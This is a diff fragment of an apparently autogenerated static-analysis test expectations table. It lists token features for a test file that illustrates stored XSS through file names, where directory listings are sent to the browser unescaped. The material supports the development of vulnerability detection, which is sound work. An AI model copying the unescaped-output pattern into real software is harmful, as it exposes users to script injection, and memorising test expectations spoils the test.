contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:36:7:40 | error | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:36:7:40 | error | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:36:7:40 | error | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:11 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:11 | res | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:11 | res | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:11 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:11 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:16 | res.send | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:16 | res.send | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:16 | res.send | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:16 | res.send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:16 | res.send | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:24 | exceptional return of res.send(files1) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:24 | exceptional return of res.send(files1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:24 | exceptional return of res.send(files1) | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:24 | exceptional return of res.send(files1) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:24 | exceptional return of res.send(files1) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:24 | res.send(files1) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:24 | res.send(files1) | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:24 | res.send(files1) | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:24 | res.send(files1) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:9:8:24 | res.send(files1) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:13:8:16 | send | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:13:8:16 | send | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:13:8:16 | send | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:13:8:16 | send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:8:13:8:16 | send | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:8:18:8:23 | files1 | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/StoredXss/xss-through-filenames.js:8:18:8:23 | files1 | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:8:18:8:23 | files1 | contextFunctionInterfaces | format(files2) | @@ -22381,6 +148692,51 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:8:18:8:23 | files1 | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:8:18:8:23 | files1 | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:8:18:8:23 | files1 | receiverName | res | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:15:4 | http | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:15:4 | http | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:15:4 | http | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:15:17 | http.createServer | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:15:17 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:15:17 | http.createServer | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:40:2 | exceptional return of http.cr ... });\\n}) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:40:2 | exceptional return of http.cr ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:40:2 | exceptional return of http.cr ... });\\n}) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:40:2 | http.cr ... });\\n}) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:40:2 | http.cr ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:1:40:2 | http.cr ... });\\n}) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:6:15:17 | createServer | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:6:15:17 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:6:15:17 | createServer | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:18 | fs | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:18 | fs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:18 | fs | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:18 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:18 | fs | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:18 | this | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:18 | this | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:18 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:18 | this | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:19 | format | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:19 | format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:19 | format | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:19 | format | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:19 | format | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:19 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:19 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:19 | res | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:19 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:15:19 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | 'arguments' object of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | exceptional return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | exceptional return of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | exceptional return of anonymous function | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | functio ... });\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | functio ... });\\n} | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | functio ... });\\n} | calleeImports | http | @@ -22388,6 +148744,146 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | functio ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | functio ... });\\n} | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | functio ... });\\n} | receiverName | http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | return of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:19:40:1 | return of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:29:15:31 | req | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:29:15:31 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:29:15:31 | req | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:29:15:31 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:29:15:31 | req | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:15:34:15:36 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:17:4 | this | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:17:4 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:17:4 | this | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:17:4 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:17:4 | this | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:17:5 | files3 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:17:5 | files3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:17:5 | files3 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:17:5 | files3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:17:5 | files3 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | 'arguments' object of function format | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | 'arguments' object of function format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | 'arguments' object of function format | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | 'arguments' object of function format | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | 'arguments' object of function format | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | exceptional return of function format | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | exceptional return of function format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | exceptional return of function format | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | exceptional return of function format | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | exceptional return of function format | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | functio ... ;\\n } | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | functio ... ;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | functio ... ;\\n } | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | functio ... ;\\n } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | functio ... ;\\n } | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | return of function format | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | return of function format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | return of function format | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | return of function format | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | return of function format | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:14:17:19 | format | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:18 | files3 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:18 | files3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:18 | files3 | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:18 | files3 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:18 | files3 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:18 | files3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:18 | files3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:18 | files3 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 = [] | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 = [] | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 = [] | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 = [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 = [] | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:22:18:23 | [] | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:22:18:23 | [] | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:22:18:23 | [] | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:22:18:23 | [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:22:18:23 | [] | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:18:22:18:23 | [] | stringConcatenatedWith | -endpoint- | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:14 | files2 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:14 | files2 | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:14 | files2 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:14 | files2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:14 | files2 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:19 | files2.sort | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:19 | files2.sort | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:19 | files2.sort | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
